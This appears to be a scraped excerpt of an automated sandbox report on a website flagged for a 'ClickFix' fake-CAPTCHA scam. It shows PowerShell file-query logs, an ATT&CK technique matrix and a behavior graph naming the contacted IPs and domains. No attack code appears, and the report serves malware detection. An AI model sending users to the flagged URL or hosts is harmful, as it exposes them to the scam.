          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire Infrastructure1
          Drive-by Compromise          		Windows Management Instrumentation1
          Browser Extensions          		1
          Process Injection          		1
          Masquerading          		OS Credential Dumping1
          Security Software Discovery          		Remote ServicesData from Local System1
          Encrypted Channel          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/Job1
          DLL Side-Loading          		1
          DLL Side-Loading          		21
          Virtualization/Sandbox Evasion          		LSASS Memory1
          Process Discovery          		Remote Desktop ProtocolData from Removable Media1
          Non-Standard Port          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
          Process Injection          		Security Account Manager21
          Virtualization/Sandbox Evasion          		SMB/Windows Admin SharesData from Network Shared Drive3
          Ingress Tool Transfer          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
          Software Packing          		NTDS1
          Application Window Discovery          		Distributed Component Object ModelInput Capture4
          Non-Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          DLL Side-Loading          		LSA Secrets2
          File and Directory Discovery          		SSHKeylogging5
          Application Layer Protocol          		Scheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials11
          System Information Discovery          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 1708558 URL: https://www.elevate.inc/our-story Startdate: 06/06/2025 Architecture: WINDOWS Score: 84 45 Suricata IDS alerts for network traffic 2->45 47 Malicious sample detected (through community Yara rule) 2->47 49 Yara detected CAPTCHA Scam ClickFix 2->49 51 3 other signatures 2->51 6 powershell.exe 14 15 2->6         started        10 chrome.exe 2 2->10         started        12 msedge.exe 106 871 2->12         started        14 chrome.exe 2->14         started        process3 dnsIp4 39 74.208.195.188 ONEANDONE-ASBrauerstrasse48DE United States 6->39 53 Found suspicious powershell code related to unpacking or dynamic code loading 6->53 16 conhost.exe 1 6->16         started        41 192.168.2.17, 443, 49677, 49722 unknown unknown 10->41 18 chrome.exe 10->18         started        43 239.255.255.250 unknown Reserved 12->43 21 msedge.exe 109 12->21         started        23 msedge.exe 12->23         started        25 msedge.exe 12->25         started        signatures5 process6 dnsIp7 27 user.elevateaccounts.com 18.161.156.112, 443, 49742 MIT-GATEWAYSUS United States 18->27 29 s-part-0029.t-0009.t-msedge.net 13.107.246.57, 443, 49741, 49757 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 18->29 35 72 other IPs or domains 18->35 31 13.107.5.80 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 21->31 33 150.171.27.10 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 21->33 37 42 other IPs or domains 21->37

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.